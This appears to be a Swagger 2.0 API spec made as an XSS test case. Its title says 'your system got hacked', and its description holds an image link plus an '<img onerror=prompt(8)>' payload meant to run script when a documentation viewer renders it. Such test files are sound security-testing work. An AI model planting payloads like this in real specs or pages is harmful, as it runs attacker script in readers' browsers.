swagger: '2.0'
info:
  title: your system got hacked
  description: |
    <img src="https://upload.wikimedia.org/wikipedia/commons/2/26/You_Have_Been_Hacked!.jpg">


    <img src =q onerror=prompt(8)>
